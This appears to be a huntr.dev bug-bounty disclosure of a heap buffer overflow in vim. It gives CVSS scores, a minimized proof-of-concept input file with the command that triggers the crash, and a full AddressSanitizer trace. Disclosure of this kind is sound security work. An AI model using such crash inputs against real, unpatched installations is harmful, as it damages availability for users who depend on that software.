Heap-based Buffer Overflow in vim/vim

2021-10-0513:53:31

thecrott

www.huntr.dev

5.5 Medium

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:N/I:N/A:P

0.001 Low

EPSS

Percentile

41.0%

JSON

When fuzzing vim commit 56858e4ed (works with latest build) with clang 12 and ASan, I discovered a heap buffer overflow.

Proof of Concept

Here is minimized poc

/\%.v
5/
c

Extract then run crafted file with this command
vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!

ASan stack trace:

aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!
=================================================================
==2889370==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000013d00 at pc 0x00000049a4ef bp 0x7ffffffdbf30 sp 0x7ffffffdb6f8
READ of size 4 at 0x621000013d00 thread T0
    #0 0x49a4ee in __asan_memmove (/home/aldo/vim/src/vim+0x49a4ee)
    #1 0x4d02e0 in vim_memsave /home/aldo/vim/src/alloc.c:597:2
    #2 0x75c5f58 in u_save_line /home/aldo/vim/src/undo.c:373:16
    #3 0x757d2c4 in u_saveline /home/aldo/vim/src/undo.c:3477:9
    #4 0x757a246 in u_save /home/aldo/vim/src/undo.c:257:2
    #5 0x43002fd in op_shift /home/aldo/vim/src/ops.c:145:9
    #6 0x22d91b1 in ex_operators /home/aldo/vim/src/ex_docmd.c:7743:6
    #7 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2
    #8 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17
    #9 0x5c1b974 in do_source /home/aldo/vim/src/scriptfile.c:1406:5
    #10 0x5bffda5 in cmd_source /home/aldo/vim/src/scriptfile.c:971:14
    #11 0x5bfdd3f in ex_source /home/aldo/vim/src/scriptfile.c:997:2
    #12 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2
    #13 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17
    #14 0x203af9a in do_cmdline_cmd /home/aldo/vim/src/ex_docmd.c:594:12
    #15 0x93c5f55 in exe_commands /home/aldo/vim/src/main.c:3081:2
    #16 0x93a0249 in vim_main2 /home/aldo/vim/src/main.c:773:2
    #17 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12
    #18 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x41fe2d in _start (/home/aldo/vim/src/vim+0x41fe2d)

0x621000013d00 is located 0 bytes to the right of 4096-byte region [0x621000012d00,0x621000013d00)
allocated by thread T0 here:
    #0 0x49aced in malloc (/home/aldo/vim/src/vim+0x49aced)
    #1 0x4cd2ac in lalloc /home/aldo/vim/src/alloc.c:244:11
    #2 0x4ccfa3 in alloc /home/aldo/vim/src/alloc.c:151:12
    #3 0x9426f31 in mf_alloc_bhdr /home/aldo/vim/src/memfile.c:884:21
    #4 0x941b675 in mf_new /home/aldo/vim/src/memfile.c:376:26
    #5 0x387b40b in ml_new_data /home/aldo/vim/src/memline.c:4068:15
    #6 0x3867f37 in ml_open /home/aldo/vim/src/memline.c:394:15
    #7 0x694e5f in open_buffer /home/aldo/vim/src/buffer.c:190:9
    #8 0x93ae2a2 in create_windows /home/aldo/vim/src/main.c:2851:9
    #9 0x939c80d in vim_main2 /home/aldo/vim/src/main.c:704:5
    #10 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12
    #11 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vim/src/vim+0x49a4ee) in __asan_memmove
Shadow bytes around the buggy address:
  0x0c427fffa750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c427fffa7a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2889370==ABORTING